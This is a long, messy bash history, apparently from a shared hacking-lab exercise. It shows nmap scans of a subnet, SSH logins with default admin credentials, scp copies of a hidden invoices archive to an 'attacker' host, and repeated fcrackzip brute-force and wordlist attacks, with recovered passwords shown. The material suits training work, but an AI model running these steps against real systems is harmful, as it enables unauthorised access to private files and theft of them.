nmap -F 10.1.26.254
ssh 10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
nano Mydata.xlsx
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
ls
cd ..
ls
cd ..
ls
cd admin/
ls
ls -la
ls -lar
cd ..
cd ..
ls
cd home/
ls
dc debian/
cd debian/
ls
ls -la
cd ..
find --help
find . -name *.zip
cd admin/
ls
cd personal/
ls
ls -la
els
exit
scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/hacking
ls
ls -la
man fcrackzip
fcrackzip -b a1:
man fcrackzip
fcrackzip -c a -p aaaaaa .invoices2019.zip
fcrackzip -p a -l 1 .invoices2019.zip
fcrackzip -l 1 .invoices2019.zip
fcrackzip -l 1 10 .invoices2019.zip
fcrackzip -b -c  .invoices2019.zip
fcrackzip -b -c 'a' .invoices2019.zip
fcrackzip -b -c 'a' -u .invoices2019.zip
fcrackzip -b -c 'aA1' -u .invoices2019.zip
fcrackzip -b -c 'aA1' -l 1-6 -u .invoices2019.zip
fcrackzip -b -c 'aA1!' -l 1-6 -u .invoices2019.zip
fcrackzip -b -c 'aA1!' -u .invoices2019.zip
fcrackzip -D -u -p /root/hacking/wordlist.txt .invoices2019.zip
ls
nano wordlist.txt
ls -la
find . -type f -print | args -0 -n 1 dirname
find . -type f -print
ls -la
cd /
find . -type d ! -empty
ls -la
cd home
ls -la
cd user-access/
ls -la
cd ../..
ls -la
ls -la
cd Desktop
ls -la
cd..
cd /root
ls -la
cd hacking
ls -la
arp -a
nmap 192.168.128.238
nmap 10.1.26.1
nmap 192.168.128.1
nmap 192.168.128.238/514
nmap -sT 10.1.26.0/24
ssh admin@10.1.26.9
cd /
ls -la
cd home
ls -la
cd admin
ls -la
cd personal/
ls
ls- la
ls - la
ls
ls -la
pwd
logout
cd ../Desktop/
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /
ls -la
cd /
ls -la
cp .invoices2019.zip ~/Desktop/
cd  ~/Desktop/
ls -la
fcrackzip -D -c
fcrackzip -D -c .invoices2019.zip
fcrackzip -D  .invoices2019.zip
fcrackzip -b -c 'a'  .invoices2019.zip
fcrackzip -b -c 'a' -u .invoices2019.zip
fcrackzip -b -c 'a1' -u .invoices2019.zip
man fcackzip
man fcrackzip
man fcackzip
man fcackzip
man fcrackzip
fcrackzip -h
fcrackzip -b  -u .invoices2019.zip
ls
cd Documents/
ls
cd ..
ls -a
ls -l
ls -la
cd hacking/
ls
nmap --help
nmap -sV 10.1.26/24
nmap -sV 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal/
ls -a
scp admin@10.1.26.9:/remote/personal/.invoices2019.zip /local/Documents
scp admin@10.1.26.9:/personal/.invoices2019.zip /local/Documents
scp .invoices2019.zip root@10.1.26.23:/root/Downloads
exit
scp admin@10.1.26.9/~/personal/.invoices2019.zip /root/Downloads
scp admin@10.1.26.9:/admin/personal/.invoices2019.zip /root/Downloads
scp admin@10.1.26.9:/personal/.invoices2019.zip /root/Downloads
ssh admin@10.1.26.9
ls
cd personal/
pwd
exit
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root/Downloads
cd ..
cd Downloads/
ls
ls -a
man fcrackzip
fcrackzip .invoices2019.zip -D /root/hacking/wordlist.txt
man fcrackzip
fcrackzip .invoices2019.zip -D -p /root/hacking/wordlist.txt
exit
ls
cd Desktop/
ls
cd ..
ls Dow
ls Downloads/
ls Downloads/
ls Public/
ls Videos/
ls Documents/
ls hacking/
nmap --help
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
cd ..
ls
cd personal/
ls
ls Croatia\ 2019/
cd ..
cd personal/Italy\ 2018/
ls
cd ..
ls
cd ..
find . -iname 10.1.26.9
find . -iname \*.zip
cd personal/
ls -l
ls -la
scp .invoices2019.zip
scp @: .invoices2019.zip
scp @: / .invoices2019.zip
scp @: / invoices2019.zip
cd ..
scp @: personal/
scp @: /personal/
scp @: / personal/
scp @: / personal
scp @: .invoices2019.zip /
cd personal/
cd personal/
scp @: .invoices2019.zip /
scp admin@10.1.26.9 .invoices2019.zip /
csp --help
scp --help
scp @: /
scp admin@10.1.26.9:/personalinvoices2019.zip /
scp admin@10.1.26.9:/personal/invoices2019.zip /
scp admin@10.1.26.9:/personal/.invoices2019.zip /
scp admin@10.1.26.9:~/personal/.invoices2019.zip /
scp / admin@10.1.26.9:~/personal/.invoices2019.zip
scp /:~/personal/.invoices2019.zip admin@10.1.26.9
scp ~/personal/.invoices2019.zip admin@10.1.26.9
man fraccrzip
cd ..
exit
ls
ssh admin@10.1.26.9
scp ~/personal/.invoices2019.zip admin@10.1.26.9
scp ~/personal/.invoices2019.zip admin@10.1.26.9:~/
wxit
exit
ls
ls -la
ssh admin@10.1.26.9
scp ~/personal/.invoices2019.zip admin@10.1.26.9:~/
scp ~/personal/.invoices2019.zip admin@10.1.26.9:~/Desktop
exit
ls -la Desktop/
cd Desktop/
ls
ls -la
cd ..
You should really use find instead.
find <dir> -iname \*.zip
Example: to search for all .zip files in current directory and all sub-directories try this:
find . -iname \*.zip
man fcrackzip
ssh admin@10.1.26.9
scp ~/personal/.invoices2019.zip ~/Desktop
exit
find . -iname \*.zip
ssh admin@10.1.26.9
scp ~/personal/.invoices2019.zip ~/
exit
find . -iname \*.zip
ssh admin@10.1.26.9
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/Desktop
exit
cd Desktop/
ls -la
ssh admin@10.1.26.9
scp admin@10.1.26.9:~/personal/.invoices2019.zip root@attacker:~/Desktop
scp admin@10.1.26.9:~/personal/.invoices2019.zip root@attacker:~/Desktop
cd personal/
pwd
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@attack
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/Desktop
exit
ls -la
ls
cd /root
ls
ls -l
cd hacking
ls
cat wordlist.txt
more wordlist.txt
ping 10.1.26.0
ping -b 10.1.26.0
nmap 10.1.26.0
nmap -Pn 10.1.26.0
nmap -Pn --open 10.1.26.0
nmap -Pn --open 10.1.26.0/24
ssh 10.1.26.9
ssh admin@10.1.26.9
ssh admin@10.1.26.9 && admin
sshpass -p "admin" ssh admin@10.1.26.9
echo "admin" > ssh admin@10.1.26.9
echo "admin" > ssh admin@10.1.26.9
echo "admin" | ssh admin@10.1.26.9
ssh admin@10.1.26.9
ls
ls -a
cd personal
ls -a
cd /
ls
cd home
ls
cd ~
cd personal
pwd
ls -a
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip .
ls
ls -a
man fcrackzip
fcrackzip --dictionary .invoices2019.zip
unzip .invoices2019.zip
fcrackzip --dictionary .invoices2019.zip
man fcrackzip
fcrackzip --dictionary .invoices2019.zip
fcrackzip -D .invoices2019.zip
unzip -P aaaaaa .invoices2019.zip
ls -a
cd invoices2019/
ls
cd ..
fcrackzip .invoices2019.zip
unzip .invoices2019.zip
cd invoices2019/
ls
cat TAX15796249.txt
cat TAX15796252.txt
man fcrackzip
cd ..
fcrackzip -b .invoices2019.zip
fcrackzip -u .invoices2019.zip
fcrackzip -u -D .invoices2019.zip
fcrackzip -u -D aaaaaa .invoices2019.zip
fcrackzip -u -p aaaaaa .invoices2019.zip
fcrackzip -u -p aaaaa .invoices2019.zip
fcrackzip -u -p aaaa .invoices2019.zip
ls
fcrackzip -u -D hacking/wordlist.txt .invoices2019.zip
fcrackzip -u -D -p hacking/wordlist.txt .invoices2019.zip
unzip .invoices2019.zip
cd invoices2019/
ls
cat TAX15796249.txt
ls
ls
touch file.txt
ls
rm file.txt
/root
ls
ls -a
cd ..
ls
cd
ls
ls
ls -a
ls
cd
ls
ls
cd ..
ls
cd debian
ls
cd
ls
ls -a
cd hacd cd d
asdasdasddasdas
cd hacker
cd hacking
ls
ls -a
nmap --help
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal
ls
ls Croatia\ 2019/
ls Italy\ 2018/
cd
ls /a
ls -a
cd personal
ls
ls -a
scp .invoices2019.zip @: /
scp @: /
cp .invoices2019.zip copy.zip
ls
scp copy.zip @: /
scp @> {
scp @: /
scp .invoices2019.zip  @:/
history
scp admin@10.1.26.9:personal/.invoices2019.zip /
cd /
ls
cd root
ls
scp admin@10.1.26.9:personal/.invoices2019.zip /root
ls /a
ls -a
man frackzip
man fcrackzip
fcrackzip .invoices2019.zip --brute--force
fcrackzip --h
fcrackzip .invoices2019.zip -b
unzip -p akRfdN .invoices2019.zip
ls
ls -a
mkdir invoices
unzip -p akRfdN .invoices2019.zip -d invoices
unzip -P akRfdN .invoices2019.zip -d invoices
cd invoices/
ls
cd invoices2019/
ls
cat TAX157962.txt
cat TAX15796249.txt
cat TAX15796252.txt
cat TAX15796259.txt
cd ..
cd ..
ls
man fcrackzip
copy .invoices2019.zip copy.zip
cp .invoices2019.zip copy.zip
unzip -P akRfdN .invoices2019.zip -d invoices
fcrackzip .invoices2019.zip -b
man fcrackzip
fcrackzip --use--unzip copy.zip
man fcrackzip
fcrackzip -u copy.zip
man fcrackzip
fcrackzip .invoices2019.zip -b -l 1
fcrackzip .invoices2019.zip -b -l 2
man fcrackzip
fcrackzip .invoices2019.zip -b
fcrackzip -l 1 -b copy.zip
fcrackzip -l 6 -b copy.zip
fcrackzip -b copy.zip -l 4
fcrackzip -b copy.zip -l 3
fcrackzip -b copy.zip -l 5
fcrackzip -b copy.zip -l 4
:*l=man fcrackzip
man fcrackzip
fcrackzip -b copy.zip -l 4-10 -u
fcrackzip -b copy.zip -l 4 -u
ls -a
fcrackzip -b copy.zip -u
fcrackzip -b copy.zip -u -l 5
cd hacking
ls
cat wordlist.txt
man fcrackzip
fcrackzip -D wordlist.txt -u copy.zip
man fcrackzip
fcrackzip -D -p wordlist.txt copy.zip
history
fcrackzip -D -p wordlist.txt copy.zip
fcrackzip -D -p wordlist.txt copy.zip -u
ls
unzip -P IhateMyJob -d invoices
su
ls
whoami
pwd
cd /root
ls
cd
ls
cd hacking/
ls
cat wordlist.txt
ls
man nmap
nmap --open 10.1.26.0/24
nmap -A --open 10.1.26.0/24
nmap --open 10.1.26.0/24
ssh admin@10.1.26.9
ssh admin@10.1.26.9
whoami
id
pwd
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd ..
man scp
cd
cd ..
cd ..
ls\
cd
scp @: /
cd ..
ls
cd debian/
ls
ls -la
scp @: /
cd ..
cd
ls -la
cd personal/
ls -la
exit
ls
scp admin@10.1.26.9:/
scp -r .. admin@10.1.26.9:/home/admin/
scp -r admin@10.1.26.9:/home/admin/
scp -r /root/hacking/ admin@10.1.26.9:/home/admin/
ls
ssh admin@10.1.26.9
ls
exit
scp -r admin@10.1.26.9:/home/admin/ /root/hacking/
ls
cd admin/
ls
rm -rf hacking/
ls
cd personal/
ls
ls -la
ls
man fcrackzip
fcrackzip -Fv .invoices2019.zip
fcrackzip -Dv .invoices2019.zip
fcrackzip -Dv ../../wordlist.txt .invoices2019.zip
fcrackzip -Dv .invoices2019.zip ../../wordlist.txt
man fcrackzip
fcrackzip -Dvp ../../wordlist.txt .invoices2019.zip
exit
exit
cd /root
ls -l
cd hacking
ls -l
nmap --help
nmap
ipconfig
ifconfic
ifconfig
nmap 10.1.26.0
nmap 10.1.26.0/24
ssh --help
man ssh
ssh admin@10.1.26.9
ls -l
cd personal
ls -l
man nfs
man cpy
man cp
man scp
ifconfig
scp ./Mydata.xlsx root@192.168.129.231:/~
scp admin@10.1.26.9:~/personal/Mydata.xlsx /~
find / | grep .zip
scp admin@10.1.26.9:~/personal/.invoices.zip /~
scp admin@10.1.26.9:"~/personal/.invoices.zip" /~
scp admin@10.1.26.9:~/personal/.invoices2019.zip /~
cd ..
fcrackzip
fcrackzip
man fcrackzip
ls -la
cd ~/
ls -al
find / | grep .invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/hacking
cd ~/hacking
ls -al
man fcrackzip
fcrackzip --dictionary .invoices2019.zip
fcrackzip --dictionary ./.invoices2019.zip
fcrackzip ./.invoices2019.zip
man fcrackzip
fcrackzip -D ./.invoices2019.zip
man fcrackzip
fcrackzip -b ./.invoices2019.zip
find / | grep fcrackzip
fcrackzip -D /var/lib/dpkg/info/fcrackzip.list ./.invoices2019.zip
man fcrackzip
fcrackzip -Dp /var/lib/dpkg/info/fcrackzip.list ./.invoices2019.zip
fcrackzip -D -p /var/lib/dpkg/info/fcrackzip.list ./.invoices2019.zip
fcrackzip -D -p/var/lib/dpkg/info/fcrackzip.list ./.invoices2019.zip
fcrackzip -D -p./wordlist.txt ./.invoices2019.zip
./.invoices.zip
./.invoices2019.zip
chmod ./.invoices2019.zip 777
chmod 777 ./.invoices2019.zip
./.invoices2019.zip
cat ./.invoices2019.zip
zip
logout
zip ./.invoices2019.zip
unzip ./.invoices2019.zip
cat ./invoices2019TAX15796249.txt
cat ./invoices2019/TAX15796249.txt
cd /root
ls - la
ls -la
ls
cd hacking
ls
ls
cd /root
ls
ls -la
ls
ls -la
cd ..
ls
ls -la
pwd
cd tmp
ls
cd ..
cd /root
pwd
ls
ls -la
ls
cd Documents
ls
cd /
ls
ls -la
cd sys
ls
ls -la
cd ..
ls
ls -la
cd /root
ls
cd desktop
cd Desktop
ls
cd ..
cd Downloads
ls
cd ..
ls -l
cd hacking
ls
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal
ls
ls -la
man scp
scp
scp @:invoices2019.zip
scp invoices2019.zip
man fcrackzip
fcrackzip -h
ls
ls -la
fcrackzip -D .invoices2019.zip
sft
scp
scp admin@server:.invoices2019.zip root@attacker:file.zip
scp admin@server:.invoices2019.zip file.zip
scp admin@server:invoices2019.zip file.zip
scp admin@server:.invoices2019.zip file.zip
pwd
fcrackzip -D -u -p /root/hacking/wordlist.txt /home/admin/personal/.invoices2019.zip
fcrackzip -D -u -p /root/hacking/wordlist.txt .invoices2019.zip
cp .invoices2019.zip /root/file.zip
sudo cp .invoices2019.zip /root/file.zip
scp admin@server:.invoices2019.zip
scp admin@server:.invoices2019.zip /root/file.zip
scp admin@server:invoices2019.zip /root/file.zip
ls
scp
scp admin@server:.invoices2019.zip tar get
scp admin@server:.invoices2019.zip tar get /root
scp admin@server:.invoices2019.zip root@attacker:file.zip
su root
ls
cd /
ls
cd home
ls
cd debian
ls
cd home
cd ..
ls
user-acces
cd user-acces
pwd
ls -a
cd .
pwd
cd debian
ls
ls -a
cd ..
cd user-access
ls
ls -a
whoami
cd root/home
cd /home/root
cd root
cd /root
ls
cd hacking
ls
nmap
nmap 10.1.26.0/24
ssh admin@10.1.26.4
ssh admin@10.1.26.4
ssh admin@10.1.26.4
ssh admin@10.1.26.4
ssh admin@10.1.26.4
ssh admin@10.1.26.9
whoami
ls
cd /root
ls
cd personal
ls
cd /
ls
cd home
ls
admin
cd admin
ls
cd ..
ls
cd ..
ls
cd root
cd home
ls
cd debian
ls
cd ..
ls -a
cd admin
ls
cd personal
ls
cd "Croatia 2019"
ls
cd ..
cd "Italy 2018"
ls
cd ..
cd ..
ls
cd ..
ls
cd ..
ls
find . -type f -name "*.zip"
cd home
cd admin
cd personal
ls
ls -a
scp
scp .invoices2019.zip attacker@10.1.26.9:/root
scp admin@10.1.26.9.invoices2019.zip /attacker/
scp admin@10.1.26.9:.invoices2019.zip /attacker/
scp admin@10.1.26.9:/.invoices2019.zip /attacker/
scp ./.invoices2019.zip attacker@10.1.26.9:/
exit
scp admin@10.1.26.9:./home/admin/personal/.invoices2019.zip ~/hacking
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip ~/hacking
ls
ls -a
man fcrackzip
find -type f -name "wordlist.*"
ls
fcrackzip -u -v -D wordlist.txt .invoices2019.zip
fcrackzip -u -v -D wordlist.txt /.invoices2019.zip
fcrackzip -u -v -D ./wordlist.txt ./.invoices2019.zip
fcrackzip -u -v -D ./.invoices2019.zip ./wordlist.txt
fcrackzip -v -u -D ./wordlist.txt ./.invoices2019.zip
fcrackzip -v -u -D wordlist.txt ./.invoices2019.zip
fcrackzip -v -u -D wordlist.txt .invoices2019.zip
fcrackzip -v -u .invoices2019.zip
fcrackzip -v -u -p wordlist.txt .invoices2019.zip
fcrackzip -v -u -d wordlist.txt .invoices2019.zip
fcrackzip -v -u -D wordlist.txt .invoices2019.zip
fcrackzip -v -u -D -p wordlist.txt .invoices2019.zip
ls
ls
ll
ls
cd /root
ls
ls hacking/
ll
ls -l
cd Desktop/
ls
cd ..
ls Documents/
ls Downloads/
ls hacking/
su root
ls hacking/
nmap -sS 10.1.26.0/24
ssh admin@10.1.26.9
ls
pwd
cd personal/
ls
ls Croatia\ 2019/
ls -l
ls Italy\ 2018/
ls Croatia\ 2019/
more Mydata.xlsx
ls
more Romeo-and-Juliet.pdf
ls
more Treasure-Island.pdf
clear
ls
cd ..
ls
cd ..
ls
cd debian/
ls
cd ..
ls -a
cd ..
ls
ls lost+found/
cd home/
ls
ls admin/
ls -a
ls -a admin/
ls admin/.profile
ls
cd admin/
ls
cd personal/
ls -a
scp .invoices2019.zip attacker@10.1.26.26
exit
ls
ssh admin@10.1.26.9
ls
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls -a
cd personal/
ls
ls -a
scp .invoices2019.zip attacker@10.1.26.26:/home
scp .invoices2019.zip attacker@10.1.26.23:/home
scp .invoices2019.zip root@10.1.26.23:/home
scp .invoices2019.zip attacker@10.1.26.23:/home
scp .invoices2019.zip root@10.1.26.23:/home
scp .invoices2019.zip root@10.1.26.23:/
scp .invoices2019.zip root@10.1.26.23:/root
exit
scp admin@10.1.26.9:/personal/.invoices2019.zip /root/
ssh admin@10.1.26.23
ssh admin@10.1.26.9
ls
cd personal/
pwd
exit
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root/
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip root@10.1.26.23:/root
su root
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root/
ls
cd ..
cd ..
cd ..
ls
cd root/
ls
ls -a
mv .invoices2019.zip invoices2019.zip
ls
unzip invoices2019.zip
fcrackzip -b invoices2019.zip
ls
cd hacking/
ls
more wordlist.txt
fcrackzip -u -D -p /root/hacking/wordlist.txt /root/invoices2019.zip
cd ..
unzip invoices2019.zip
ls
cd invoices2019/
ls
more TAX157962
more TAX15796249.txt
more TAX15796252.txt
more TAX15796259.txt
exit
exit
ls
cd ../
ls
cd user-access
ls
cd ../
cd debian
ls
cd ../
cd ../
ls
cd home
ls
cd user-access/
whoiam
startgame
sudo su root
sudo su root
ls
cd ../
ls
cd debian
ls
cd
cd ../
ls
cd ../
ls
cd usr
ls
cd ../
ls
cd root
ls
cd hacking/
ls
sudo cd hacking/
su root
cd hacking/
ls
nano wordlist.txt
ls
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal/
ls
exit
ssh admin@10.1.26.9
ls
cd personal
ls
cd Croatia\ 2019/
ls
cd ../
cd Italy\ 2018/
ls
cd../
cd ../
cd ../
ls
cd ../
ls
cd admin
ls
cd personal
ls
ls -a
fcrackzip .invoices2019.zip
fcrackzip
sudo apt-get install fcrackzip
fcrackzip
fcrackzip
quit
exit
fcrakzip
fcrackzip
ssh admin@10.1.26.9
ls
cd personal
ls
ls -a
exit
scp admin@10.1.26.9:personal/.invoices2019.zip
scp admin@10.1.26.9:personal/.invoices2019.zip ~/
ls
cd ../
ls
ls -a
fcrackzip .invoices2019.zip
fcrackzip -u -c a -1 2-5 .invoices2019.zip
fcrackzip -b -c 'a1' -l 2-5 -v -u .invoices2019.zip
ls
ls -a
fcrackzip -b -c 'a1' -l 2-5 .invoices2019.zip
unzip .invoices2019.zip
fcrackzip -b -l 2-5 .invoices2019.zip
fcrackzip -h
fcrackzip -b -u .invoices2019.zip
fcrackzip -b -c a1 -l 1-8 -u .invoices2019.zip
fcrackzip -b -c a1 -l 1-8 -v -u .invoices2019.zip
fcrackzip -b -c a1 -l 5 -v -u .invoices2019.zip
fcrackzip -b -c a1 -l 1-5 -v -u .invoices2019.zip
ls
cd invoices2019/
ls
ls
ls
ls
cd../
cd -a
ls -a
cd ../
ls
ls -a
rm -rf invoices2019/
ls
ls-al
ls -a
fcrackzip -b -c a1 -l 1-5 -v -u .invoices2019.zip
ls
man
fcrackzip -h
fcrackzip -b -l 1-5 -v -u .invoices2019.zip
ls
cd hacking
la
ls
c d../
cd ../
fcrackzip -D ./hacking/wordlist.txt .invoices2019.zip
ls
fcrackzip -D hacking/wordlist.txt .invoices2019.zip
fcrackzip .invoices2019.zip
fcrackzip -u -v -D -p ./hacking/wordlist.txt .invoices2019.zip
ls
cd /root
ls
cd Downloads/
ls
ls -al
cd ..
ls -al
cd hacking/
ls
cat wordlist.txt
clear
cd ..
ls
cd Do
cd Documents/
ls
cd ..
cd Pictures/
ls
cd /home
ls
cd
ls
cd hacking/
ls
CD..
cd..
clear
cd ..
ls
cd Templates/
ls
cd ..
clear
ls
cd Music/
ls
nmap 10.1.26.0/24
ssh admin@10.1.26.9
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd ..
ls
cd Italy\ 2018/
ls
cd ..
ls
cd /home
ls
cd admin/
ls
cd ..
ls
cd debian/
ls
cd
ls
ls -al
cd personal/
ls
scp @: /
ls -al
clear
cd ..
ls
scp @: /personal
ifconfig
ipconfig
scp attacker@10.1.26.23: /personal
clear
exit
ls -al
scp attacker@10.1.26.23: /personal
clear
nmap
ls
cd personal/
ls
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
clear
disconnect
exit
clear
ls
cd DOnw
cd Downloads/
ls
cd ..
ls
ls -al
cd Downloads/
clear
ls -al
cd ..
ls
cd /root
ls
ls -al
clear
cd Desktop/
ls
ls -al
find
find .invoices2019.zip
where .invoices2019.zip
ssh admin@10.1.26.9
ls
cd personal
scp admin@10.1.26.9:~/personal/.invoices2019.zip /hacking
scp admin@10.1.26.9:~/personal/.invoices2019.zip /Downloads
scp admin@10.1.26.9:~/personal/.invoices2019.zip /
scp admin@10.1.26.9:~/personal/.invoices2019.zip .
scp /hacking admin@10.1.26.9:~/personal/.invoices2019.zip .
clear
ls
ls
where
find invoices2019.zip
cd ..
ls
ls -al
clear
cd /home
ls
cd debian/
ls
ls -al
scp /hacking admin@10.1.26.9:~/personal/.invoices2019.zip .
exit
ls -al
fcrackzip -D -u -p /root/hacking/wordlist.txt .invoices2019.zip
id
whoami
clear
pwd
whoami
ls -la
sudo su
su root
ls -la
cd ~
ls -la
cd hacking
ls
cat wordlist.txt
cd ..
ls
cd ls -la
ls -la
ls ./hacking
which nmap
man nmap
nmap -sS -sV 10.1.26.0/24
ssh admin@10.1.26.9
pwd
ls -la
cd personal/
ls -la
cat Mydata.xlsx
ls
ls -la
which fcrackzip
which fcrackzip
su root
cd ~
man scop
man scp
ifconfig
ip
cd ..
ls
cd personal/
ls -la
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~
ls -la
which fcrackzip
fcrackzip -D hacking/wordlist.txt .invoices2019.zip
fcrackzip .invoices2019.zip -D hacking/wordlist.txt
fcrackzip -D .invoices2019.zip
fcrackzip -D -p hacking/wordlist.txt .invoices2019.zip
bze
bye
exit
exit
bye
su root
ls
cd ..
ls
cd ..
ls
cd home
ls
cd user-access/
ls
cd ..
cd debian/
ls
ls
exit
ls
ls
ls
cd ..
ls
cd debian/
ls
cd ..
cd user-access/
ls
cd ..
su - root
ls
cd hacking/
ls
nmap 10.1.26.0
nmap 10.1.26.0/24
admin@10.1.26.23
ssh admin@10.1.26.23
ssh admin@10.1.26.9
ls
cd personal
ls
pwd
ls
cd Croatia\ 2019/
ls
cd ..
cd Italy\ 2018/
ls
cd ..
cd ..
ls
cd ..
ls
cd debian/
ls
cd .
cd ..
ls
cd admin/personal/
ls
exit
ssh - admin@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal/
ls
cd ..
ls
cd ..
ls
cd debian/
ls
cd ..
ls
cd admin/
ls
cd personal/
ls
cd Croatia\ 2019/
ls
cd .
cd ..
ls
cd Italy\ 2018/
ls
cd ..
nano Mydata.xlsx
exit
ssh admin@10.1.26.9
ls
cd personal/
ls
cd ..
cd ..
ls
cd ..
ls
cd media/
ls
cd ..
cd mnt
ls
cd ..
cd /home
ls
cd admin/
ls
cd personal/
ls
unzip Mydata.xlsx
unzip .invoices2019.zip
ls
pwd
scp /home/admin/personal/.invoices2019.zip
exit
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /home
cd ..
ls
cd ..
ls
cd home/
ls
cd ..
su -root
su - root
cd ..
su - root
ls
cd hack
cd hack
cd hacking/
ls
pwd
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root/hacking/invoices.yip
ls
fcrackzip invoices.yip
man fcrackzip
fcrackzip -D -p wordlist.txt invoices.yip
unzip invoices.yip
ls
cd invoices2019/
ls
ls -la
cd ~
cd hacking
ls -la
cat wordlist.txt
cd~
cd ~
ls
cd hacking
ls
man nmap
sudo nmap -t4 10.1.26.0
nmap 10.1.26.0 -t
nmap 10.1.26.0 -t4
nmap 10.1.26.0
ping 10.1.26.0/24
nmap 10.1.26.0/26
nmap -F 10.1.26.0/26
nmap 10.1.26.0/26
ssh admin@10.1.26.9
ls -la
cd personal
ls
cat Mydata.xlsx
clear
ls -la
whoami
ipconfig
ip
ifconfig
clear
cd .invoices.zip
cat invoices.zip
ls -la
man zip
man
cd
ls -la
cd personal
ls
cd hacking
scp admin@~/personal/.invoices2019.zip ~/hacking
scp admin@server "~/personal/.invoices2019.zip" ~/hacking
ls
cd
scp /
% scp /
scp @: /personal/
job
admin@server:~$
root@attacker:/home# scp admin@10.1.26.9:~/personal/.invoices2019.zip
root@attacker:/home scp admin@10.1.26.9:~/personal/.invoices2019.zip
root@attacker:~/ scp admin@10.1.26.9:~/personal/.invoices2019.zip
cd
ls -la
root@attacker:~# scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9:~/personal/.invoices2019.zip /root/Desktop
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/
ls -la
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/hacking
ls -la
cd hacking
ls -la
scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/hacking#
ls
ls -la
root@attacker scp admin@10.1.26.9:~/personal/.invoices2019.zip ~/hacking
clear
/root
ls
cd hacking
cd root
ls
--help
ipconfig
ipconfig -a
/root
cd /root
ipconfig
iconfig
ifconfig
ifconfig eth0
systemctl
nmap 10.1.26.0/24
22 tcp open nfs
/22 tcp open nfs
22/tcp open nfs
2049/tcp open nfs
ssh username@10.1.26.9
ssh admin@10.1.26.9
ls
cd personal
ls
ls Crotia 2019
ls Croatia 2019
ls Croatia_2019
cd Croatia 2019
cd 'Croatia 2019'
ls
cd personal
cd
cd personal
cd 'Italy 2018'
ls
cdf
cd
cd personal
ls
ls *.zip
find personal \*.zip
find . -iname \*.zip
ssh attacker
cd home
cd
/home/admin
cd /home/admin
/home# scp admin@10.1.26.9:~/personal/.invoices2019.zip
/home# scp admin@10.1.26.9:~/personal/.invoices2019.zip.
/home# scp admin@10.1.26.9:~/personal/.invoices2019.zip
/home#scp admin@10.1.26.9:~/personal/.invoices2019.zip
/home# scp admin@10.1.26.9:~/personal/.invoices2019.zip
:/home# scp admin@10.1.26.9:~/personal/.invoices2019.zip
cd home
ls
scp admin@10.1.26.9
scp admin@10.1.26.9:~/personal/.invoices2019.zip
cd /home
scp admin@10.1.26.9:~/personal/.invoices2019.zip
cd /home
cd /home
ssh attacker@10.1.26.23
ssh username@10.1.26.23
ssh attacker@10.1.26.23
sudo frackzip
cd
sudo fcrackzip
sudo frackzip
sudo frackzip
cd
frackzip -h
fcrackzip -h
fcrackzip
fcrackzip
fcrackzip - h
fcrackzip -D
frackzip -D
fcrackzip -D
fcrackzip -D -u -p
fcrackzip -D -u -p /root/hacking/wordlist.txt .invoices2019.zip
fcrackzip -D -u -p /root/hacking/wordlist.txt .invoices2019.zip
cd /home
scp admin@10.1.26.9:~/personal/.invoices2019.zip
scp admin@10.1.26.9
scp admin@10.1.26.9
scp admin@10.1.26.9 home
clear
pwd
su root
pwd
cd root
clear
ls
ls -al
cd /root/
ls -al
cd hacking/
ls
netmap 10.1.26.0/24
clear
nmap 10.1.26.0/24
ssh admin@10.1.26.9
pwd
ls -al
cd personal/
ls -al
pwd
exit
scp admin@10.1.26.9:/home/admin/personal/.invoices2019.zip /root
ls
cd ..
ls
cd ..
ls -al
pwd
cd root/
ls -al
clear
man fcrackzip
qqq
qq
qq
clear
ls -al
mv .invoices2019.zip hacking/
cd hacking/
ls
cat wordlist.txt
clear
fcrackzip -D wordlist.txt .invoices2019.zip
clear
fcrackzip -v -u -D -p wordlist.txt .invoices2019.zip
/root
/root s^s
s/srsosos
s/srsososts
s/s/sqs]s
sqs
s/srsososts
/root
/home/root
/root/home
cd /root
cd
/cd
/root
ls /root
/hacking
ls hacking
cd wordlist.txt
ls Desktop
ls wordlist.txt
cd root/hacking
cd /root
cd /root/hacking
ls
cd
nmap 10.1.26.0/24
nmap 10.1.26.9
nmap 10.1.26.9 22/tcp
ssh username@10.1.26.9 2049
ssh admin@10.1.26.9 2049
ssh admin@10.1.26.9
ls
ls personal
ls Croatia 2019
ls /Croatia 2019
ls 'Croatia 2019'
cd Croatia 2019
cd 'Croatia 2019'
cd 'Italy 2018'
/home
ls /home
ls /admin
ls/home/admin
ls /home/admin
ls /home/admin/personal
